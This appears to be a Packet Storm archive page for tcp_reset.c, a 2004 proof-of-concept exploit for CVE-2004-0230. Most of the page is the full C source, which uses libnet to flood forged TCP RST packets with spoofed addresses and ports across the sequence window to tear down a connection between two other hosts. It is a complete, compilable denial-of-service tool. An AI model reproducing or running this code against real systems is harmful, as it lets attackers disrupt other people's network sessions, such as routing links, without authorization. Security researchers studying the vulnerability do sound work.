seeing is believing

tcp_reset.c

tcp_reset.c
Posted Apr 28, 2004
Authored by eazy

Sample proof of concept exploit that demonstrates the TCP vulnerability discovered by Paul A. Watson.

tags | exploit, tcp, proof of concept
advisories | CVE-2004-0230
MD5 | 2edd0e1dafca116fdae393cd4f64c383

tcp_reset.c

Change Mirror Download
/*
* tcp_reset.c: Proof of concept exploit that demonstrates the vulnerability described
* by Paul A. Watson in his paper "Slipping In The Window: TCP Reset Attacks"
*
* You need libnet 1.1.x
*
* Compile:
* gcc tcp_reset.c -o tcp_reset -lnet
*
* By: eazy <eazy@ondaquadra.org>
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <libnet.h>

void
usage(char *prog)
{
fprintf(stderr, "Usage: %s -s <src ip> -d <dst ip> -p <src port> -q <dst port> [-n <seq>] [-w <window size>] [-t <timeout>]\n"
"\t-s\tsource ip address\n"
"\t-d\tdestination ip address\n"
"\t-p\tsource port\n"
"\t-q\tdestination port\n"
"\t-n\tinitial sequence number (default random)\n"
"\t-w\twindow size (default 1000)\n"
"\t-t\tpacket timeout (default 10000 usec)\n"
,prog);
exit(-1);
}

int
main(int argc, char **argv)
{

int c, build_ip, opt, win = 1000, timeout = 10000;
unsigned short src_port = 0, dst_port = 0;
unsigned long src_ip = 0, dst_ip = 0, seq = 0;
libnet_t *l;
libnet_ptag_t tcp, ip;
struct libnet_stats stat;
char errbuf[LIBNET_ERRBUF_SIZE];

memset(&stat, 0, sizeof(stat));

if ((l = libnet_init(LIBNET_RAW4, NULL, errbuf)) == NULL) {
fprintf(stderr, "Libnet_init error: %s\n", errbuf);
exit(-1);
}
while ((opt = getopt(argc, argv, "s:d:p:q:n:w:t:h")) != -1)
switch (opt) {
case 's':
src_ip = libnet_name2addr4(l, optarg, LIBNET_DONT_RESOLVE);
break;
case 'd':
dst_ip = libnet_name2addr4(l, optarg, LIBNET_DONT_RESOLVE);
break;
case 'p':
src_port = atoi(optarg);
break;
case 'q':
dst_port = atoi(optarg);
break;
case 'n':
seq = strtoul(optarg, NULL, 0);
break;
case 'w':
win = atoi(optarg);
break;
case 't':
timeout = atoi(optarg);
break;
case 'h':
case '?':
usage(argv[0]);
}

if (optind < argc)
usage(argv[0]);

if (!src_ip || !dst_ip || !src_port || !dst_port)
usage(argv[0]);

if (!seq) {
libnet_seed_prand(l);
seq = libnet_get_prand(LIBNET_PRu32);
}
for (tcp = LIBNET_PTAG_INITIALIZER, build_ip = 1; seq < 4294967296 - win; seq += win) {

tcp = libnet_build_tcp(
src_port, /* source port */
dst_port, /* destination port */
seq, /* sequence number */
0, /* acknowledgement num */
TH_RST, /* control flags */
31337, /* window size */
0, /* checksum */
0, /* urgent pointer */
LIBNET_TCP_H, /* TCP packet size */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
tcp); /* libnet id */

if (tcp == -1) {
fprintf(stderr, "Libnet_build_tcp error: %s\n", libnet_geterror(l));
goto bad;
}
if (build_ip) {
build_ip = 0;
ip = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_TCP_H, /* length */
0, /* TOS */
666, /* IP ID */
0, /* IP Frag */
64, /* TTL */
IPPROTO_TCP, /* protocol */
0, /* checksum */
src_ip, /* source IP */
dst_ip, /* destination IP */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */

if (ip == -1) {
fprintf(stderr, "Libnet_build_ipv4 error: %s\n", libnet_geterror(l));
goto bad;
}
}
if ((c = libnet_write(l)) == -1) {
fprintf(stderr, "Libnet_write error: %s\n", libnet_geterror(l));
goto bad;
}
usleep(timeout);
}

libnet_stats(l, &stat);
fprintf(stderr, "Packets sent: %d (%d bytes)\n"
"Packet errors: %d\n",
stat.packets_sent, stat.bytes_written, stat.packet_errors);
libnet_destroy(l);
exit(0);

bad:
libnet_destroy(l);
exit(-1);
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    7 Files
  • 23
    Jul 23rd
    2 Files
  • 24
    Jul 24th
    19 Files
  • 25
    Jul 25th
    28 Files
  • 26
    Jul 26th
    2 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close